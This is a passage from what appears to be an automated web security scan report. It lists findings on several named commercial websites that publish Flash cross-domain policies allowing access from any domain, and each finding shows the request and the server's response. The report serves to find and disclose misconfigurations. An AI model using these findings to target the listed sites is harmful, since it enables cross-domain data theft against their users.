Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.manualsonline.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache/2.2.14 (Fedora)
Last-Modified: Wed, 26 Jan 2011 14:52:42 GMT
ETag: "d746c4-ef-49ac0fc2c4280"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" heade
...[SNIP]...
7.83. http://www.mapquest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mapquest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mapquest.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="oMxvAHE6AVKXbBWonwSpcUH2bX4="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Sat, 02-Apr-2011 12:52:31 GMT; Path=/
Set-Cookie: psession="XYhsFEjJgX/0tbwu99Px6nQHTiA="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Fri, 01-Jul-2011 12:37:31 GMT; Path=/
Set-Cookie: c_Id=MjMzOjM5Mw%3D%3D; Expires=Sat, 02-Apr-2011 13:07:31 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"209-1301684392000"
Last-Modified: Fri, 01 Apr 2011 18:59:52 GMT
Content-Type: application/xml
Content-Length: 209
Date: Sat, 02 Apr 2011 12:37:31 GMT
Connection: keep-alive

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false"/></cross-domain
...[SNIP]...
7.84. http://www.marthastewart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marthastewart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marthastewart.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 Mar 2009 21:36:48 GMT
ETag: "fcbe29-c0-d951fc00"
Accept-Ranges: bytes
Content-Length: 192
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:34:19 GMT
Connection: close

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
7.85. http://www.mate1.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mate1.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mate1.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:37 GMT
Server: Apache
Set-Cookie: DATESESS=fbd31cc9c09d8951; domain=.mate1.com; path=/
P3P: policyref="http://www.mate1.com/p3p/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Cache-Control: max-age=0, private
Expires: Sat, 02 Apr 2011 13:56:37 GMT
Content-Length: 267
Content-Type: application/xml
X-Cache: MISS from crtv4.mate1.com
Via: 1.1 crtv4.mate1.com:80 (squid/2.7.STABLE7)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" to-ports="*" />
...[SNIP]...
7.86. http://www.menshealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.menshealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.menshealth.com

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Thu, 03 Jan 2008 12:17:58 GMT
ETag: "c9-62610980"
Content-Type: text/xml
Date: Sat, 02 Apr 2011 13:36:12 GMT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
7.87. http://www.metacafe.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metacafe.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metacafe.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 03 Mar 2011 16:22:13 GMT
ETag: "17f18a6-d0-49d966e98b740"
Accept-Ranges: bytes
Content-Length: 208
Content-Type: application/xml
Cache-Control: max-age=86400
Date: Sat, 02 Apr 2011 13:23:04 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.88. http://www.metrolyrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.metrolyrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.metrolyrics.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: "c4-4c72c0fe-0"
Last-Modified: Mon, 23 Aug 2010 18:42:06 GMT
Content-Type: application/xml
Content-Length: 196
Date: Sat, 02 Apr 2011 13:25:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
7.89. http://www.minorleaguebaseball.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minorleaguebaseball.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.minorleaguebaseball.com

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:37:49 GMT
Content-Type: text/xml
Content-Length: 80
Cache-Control: max-age=60
Edge-control: max-age=60
Last-Modified: Mon, 16 May 2005 18:12:09 GMT
ETag: "50-4288e279"
Accept-Ranges: bytes
Age: 47
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
7.90. http://www.mlb.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mlb.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and uses a wildcard to specify allowed domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mlb.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 18 Jan 2011 20:14:01 GMT
Content-Length: 428
Accept-Ranges: bytes
Server: Oracle-iPlanet-Web-Server/7.0
Date: Sat, 02 Apr 2011 13:24:42 GMT
Cache-Control: max-age=60
Edge-control: max-age=60
ETag: "1ac-4d35f489"
Age: 25
X-Cache: HIT from cache.mlb.com
Via: 1.1 cache.mlb.com:8888 (squid/2.7.STABLE6)
Connection: keep-alive

<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-access-from domain="*.mlb.com" secure="false" />
   <allow-http-request-headers-from domain="*.mlb.com" headers="*" secure="false"/>
   <site
...[SNIP]...
7.91. http://www.mmo-champion.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mmo-champion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmo-champion.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Nov 2010 22:26:07 GMT
Content-Length: 332
Date: Sat, 02 Apr 2011 13:46:14 GMT
Connection: close
X-Cache-Hits: -1
X-URL: /crossdomain.xml
X-Backend: phpservers2
X-Req: 455438597
X-Language: en

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-pol
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.92. http://www.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Sat, 02 Apr 2011 12:43:43 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...
7.93. http://www.myrecipes.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myrecipes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myrecipes.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache
Last-Modified: Tue, 05 Oct 2010 18:26:00 GMT
ETag: "b13f7-d9-491e2caecde00"
Accept-Ranges: bytes
Content-Length: 217
Content-Type: application/xml
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi O TRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cros
...[SNIP]...
7.94. http://www.ncm.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ncm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ncm.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 25 Mar 2011 13:00:36 GMT
Accept-Ranges: bytes
ETag: "072eca1eceacb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:35:56 GMT
Connection: close
Content-Length: 897

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="maste
...[SNIP]...
<allow-access-from domain="tst.ncmsocial.com"/>
<allow-access-from domain="localhost.ncmsocial.com"/>
<allow-access-from domain="dev.ncmsocial.com"/>
<allow-access-from domain="ncmsocial.com"/>
<allow-access-from domain="www.ncmsocial.com"/>
<allow-access-from domain="www.totaleclips.com"/>
<allow-access-from domain="totaleclips.com"/>
<allow-access-from domain="edgesuite.net"/>
<allow-access-from domain="progressive.totaleclips.com.edgesuite.net"/>
<allow-access-from domain="www.fathomevents.com"/>
<allow-access-from domain="www.movienightout.com"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.95. http://www.newser.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newser.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newser.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Sun, 29 Mar 2020 00:00:00 GMT
Last-Modified: Sun, 01 Feb 2009 20:47:39 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 14:03:49 GMT
Connection: close
Content-Length: 324

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.96. http://www.newsok.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsok.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.newsok.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Jun 2010 19:32:53 GMT
ETag: "1bd06e-106-48a304daba340"
Accept-Ranges: bytes
Content-Type: text/xml
Connection: close
Date: Sat, 02 Apr 2011 12:52:35 GMT
Age: 556
Content-Length: 262

<?xml version="1.0"?>
<!-- http://static.newsok.biz/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="newsok..com" />
<allow-access-from domain="*.newsok..com" />
<allow-access-from domain="*" />
...[SNIP]...
7.97. http://www.nickjr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nickjr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nickjr.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Content-Length: 864
Content-Type: text/xml
Set-Cookie: ak-mobile-detected=no; expires=Sat, 02-Apr-2011 19:31:20 GMT; path=/
ETag: W/"864-1301149306000"
Vary: User-Agent
Cache-Control: max-age=1200
Date: Sat, 02 Apr 2011 13:31:20 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-polici
...[SNIP]...
<allow-access-from domain="*"/>
   <allow-access-from domain="*.doubleclick.net" />
   <allow-access-from domain="*.nickjr.com" />
   <allow-access-from domain="*.nickjr-d.mtvi.com" />
   <allow-access-from domain="*.nickjr-q.mtvi.com" />
   <allow-access-from domain="*.nick.com" />
   <allow-access-from domain="*.nick-d.mtvi.com" />
   <allow-access-from domain="*.nick-q.mtvi.com" />
   <allow-access-from domain="*.mtvi.com" />
   <allow-access-from domain="*.dimetapp.com" />
   <allow-access-from domain="*.mtvnservices.com"/>
   <allow-access-from domain="*.tween.as" />
...[SNIP]...
7.98. http://www.nola.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nola.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 324
Content-Type: text/xml
ETag: "71686e-144-47185a180bb40"
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
ntCoent-Length: 324
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:37:08 GMT
Date: Sat, 02 Apr 2011 13:37:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
7.99. http://www.nydailynews.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nydailynews.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:38 GMT
Server: Apache
Last-Modified: Fri, 14 Sep 2007 15:01:08 GMT
Accept-Ranges: bytes
Content-Length: 200
Keep-Alive: timeout=3, max=999
Content-Type: application/xml
Content-Language: en
Age: 0
Via: AX-CACHE-2.4:20
Set-Cookie: sto-id-sg-web-8080=BOACAKAK; Expires=Sat, 02-Apr-2011 02:23:19 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
7.100. http://www.oodle.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oodle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oodle.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Last-Modified: Wed, 12 Mar 2008 00:55:41 GMT
ETag: "11c80ff-ca-44832e564dd40"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:36:37 GMT
Content-Length: 202
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
7.101. http://www.openforum.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.openforum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.openforum.com

Response

HTTP/1.0 200 OK
Content-Length: 390
Content-Type: text/xml
Last-Modified: Tue, 22 Mar 2011 14:34:04 GMT
Accept-Ranges: bytes
ETag: "1CBE89E31501600"
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cache-Control: public, max-age=65014
Expires: Sun, 03 Apr 2011 07:43:08 GMT
Date: Sat, 02 Apr 2011 13:39:34 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
7.102. http://www.opportunity.co/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opportunity.co
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opportunity.co

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Feb 2011 03:06:57 GMT
ETag: "48c0006-c3-f11a7640"
Accept-Ranges: bytes
Content-Length: 195
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
7.103. http://www.outdoorchannel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorchannel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorchannel.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Last-Modified: Fri, 27 Aug 2010 15:20:56 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:07:28 GMT
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.outdoorchannel.com&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=8b192145-0a99-4adb-8be8-ad64d5a6e8cd; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Set-Cookie: EkAnalytics=newuser; expires=Mon, 02-Apr-2012 14:07:28 GMT; path=/
Content-Length: 208
Connection: close
Via: 1.1 AN-0016020121270012

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
7.104. http://www.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"194-1297458026000"
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Content-Type: application/xml
Content-Length: 194
Date: Sat, 02 Apr 2011 14:10:44 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>
7.105. http://www.people.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.people.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.people.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:25 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
<allow-access-from domain="img2-short.timeinc.net"/>
<allow-access-from domain="*.aol.com"/>
<allow-access-from domain="*.digitalcity.com"/>
<allow-access-from domain="*.aolcdn.com"/>
<allow-access-from domain="*.channel.aol.com"/>
<allow-access-from domain="*.aimtoday.com"/>
<allow-access-from domain="*.aimtoday.aim.com"/>
<allow-access-from domain="*.dashboard.aim.com"/>
<allow-access-from domain="*.aim.com"/>
<allow-access-from domain="peopleconnection.aol.com"/>
<allow-access-from domain="*.peoplecmg.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
<allow-access-from domain="*.taaz.com" secure="true"/>
...[SNIP]...
7.106. http://www.peoplestylewatch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.peoplestylewatch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.peoplestylewatch.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:32 GMT
Server: Apache
Last-Modified: Fri, 24 Sep 2010 16:23:49 GMT
ETag: "373-cdb58f40"
Accept-Ranges: bytes
Content-Length: 883
Content-Type: application/xml
Vary: Accept-Encoding,X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="img2.timeinc.net"/>
